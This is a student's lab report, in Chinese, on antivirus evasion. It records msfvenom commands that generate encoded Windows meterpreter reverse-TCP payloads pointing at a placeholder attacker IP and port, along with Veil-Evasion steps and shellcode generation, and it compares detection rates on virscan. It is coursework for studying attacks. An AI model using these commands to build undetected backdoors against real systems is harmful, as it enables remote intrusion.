20145321《网络攻防》免杀原理与实践

20145321《网络攻防》 免杀原理与实践

基础问题回答

（1）杀软是如何检测出恶意代码的？

• 某只鸟的行为举动都像鸭子，我们就把这只鸟称为鸭子。对于恶意代码也一样，如果它有恶意行为，杀软就会把这程序看作恶意软件，从而查杀。
• 另外杀软通过其特征码库，看程序是否含有特征码被匹配，从而判断此程序是否为恶意代码。

（2）免杀是做什么？

• 免杀是让恶意代码不会被杀毒软件检测查杀的技术。

（3）免杀的基本方法有哪些？

• 加壳改壳
• 加花指令
• 修改内存特征码

实践过程记录

msfvenom直接生成meterpreter可执行文件

1.用命令生成meterpreter可执行文件

2.用ncat将文件传到windows后用virscan进行检测

Excuse me？难道我就这样做成了免杀实验吗？…然而机智的我是不会被它蒙骗的，一定有什么地方不对！

原来传了个0 byte的文件，尴尬……那我们重新来一次。

重新生成了try2.exe ，再次用virscan网站来检测

检测结果如下：

Msfvenom使用编码器生成meterpreter可执行文件

1.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -b ‘\x00’ LHOST=攻击主机ip LPORT=监听端口 -f exe > xxx.exe

命令生成一次加壳的可执行文件。

再次检测，但好像并没什么用，查杀概率还是一样：

2.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=攻击者ip LPORT=监听端口 -f exe > xxx.exe

编码加壳10次看看效果

效果差不多，感觉依然鸡肋。

使用Veil-Evasion生成可执行文件

直接在终端输入veil-evasion打开软件

输入命令 use python/meterpreter/rev_tcp set LHOST xxx... generate xxx...

继续检测：

被检测到的概率减少了一半。

用Shellcode编程

使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=监听端口号 -f c 生成一个shellcode数组

再次用virscan检测：

可以看到被检测到的概率降低了很多。